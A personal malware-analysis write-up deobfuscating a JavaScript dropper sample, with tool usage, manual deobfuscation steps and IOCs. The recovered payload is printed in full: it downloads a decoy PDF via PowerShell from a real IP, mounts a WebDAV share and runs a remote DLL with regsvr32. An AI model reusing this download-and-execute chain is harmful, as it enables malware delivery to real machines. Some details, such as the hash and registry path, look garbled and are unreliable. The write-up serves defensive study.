Malware Analysis – Javascript Deobfuscation

Intro

I recently started conducting some malware analysis, and I found myself particularly intrigued by a section focused on JavaScript code analysis. I thought it would be the perfect opportunity to dive deeper and sharpen my skills by working with real-world examples. So, here’s a quick and straightforward analysis to get started!

Sample

• I obtained a real sample from MalwareBazzar

Tools

1. REMnux - Linux
2. Ghost Windows 10 (contain my own malware tools)

Static Analysis

SHA256- Hash : 58d9dfb6906f5d06e85773461bd8ecc23f836a73dc0ef98a537e2385faeaaf43cbf5c548e7564bf7c3a09fcbc01259a2

Well, let's give it a first look in notepadd++.

Observations

1. The actual code that will execute is at the beggining of the script.
2. Many variables to obfuscate the code, Each variable contains many chars, so our mission is to find the pattern the code is made from that obfuscation.

Deobfuscation with SpiderMonkey

Let's give it a try to deobfuscate it with spidermonkey tool in REMnux.

js -f sample.js

It didn't work well for deobfuscation, but give us one clue, an eval fucntion at line 21

So, I tried to use box-js as it helps to emulate the run time components (like faking urls the malware trying to get)

box-js sample.js --download

when checking IOC.json and rest fo files, It observed only that there is a registy key being written, but other files contain wiered scripts that doesn't related to the malware :XD.

Manual Deobfuscation

I will replace each variable with a readable "charX" : x will be a number that will increase, just to make it more readable

Example :

this[mqihfsol+olhntqaar+igjpssh+hevjsqi+tslwgc+mkutxa+qmqctvq] == this[char1+char2+char3+char4+char5+char6+char7]

final one will be more easy to parse.

Now, there are many variables, each variable have 28-45 character, we need to find which character will be placed before running the script.

So, I start looking for something the script must include http://, and i found this

http://  ==   char15+char7+char7+char6+char38+char20+char20 

and i start looking at the values of each char, they are in sequences, i mean this :

And configured that the script call the last char of each variable.

So, we now need to only replace last char with each variable.

After Replacement :

func=var0[ev  ""  al];func("array=[10374,12422,14470,13446,11398,12415];var2=this[WScript][CreateObject](WScript.Shell);var3=cmd /c powershell.exe -Command \Invoke-WebRequest -OutFile %temp%\\invoice.pdf http:// 193.143.1.205/invoice.php\&&start %temp%\\invoice.pdf&&cmd /c net use \\\\193.143.1.205@8888\\davwwwroot\\&&cmd /c regsvr32 /s \\\\193.143.1.205@8888\\davwwwroot\\100758775027.dll;var4 = var0[parseInt](var2[RegRead](HKLM_CURRENT_USER\\Control panel\\International\\Locale), 88);var4=9343;for(var1=0;var1<array[length];var1){if(var4 === array[var1]){var2[run](var3,0,0);break;}}")

IOCs

1. http://193.143.1.205/invoice.php\&&start %tmp%\\invoice.pdf

2. \\\\193.143.1.205@8888\\davwwwroot\\

3. \\\\193.143.1.205@8888\\davwwwroot\\100758775027.dll

4. HKLM_CURRENT_USER\\Control panel\\International\\Locale

Behavioural Analysis

Let's ping the C2 if it is active.

Yes, it is, now let's download invoice.php that will be saved in %tmp%\\invoice.pdf

It is a pdf, when i parsed it with pdf-parser.py, it doesn;t contain any js codes. And confirmed that with virustotal.

So, Let's look further and try to download the dll 100758775027.dll.

But, the server was off.

So, our analysis concludes here.

See you! 🚀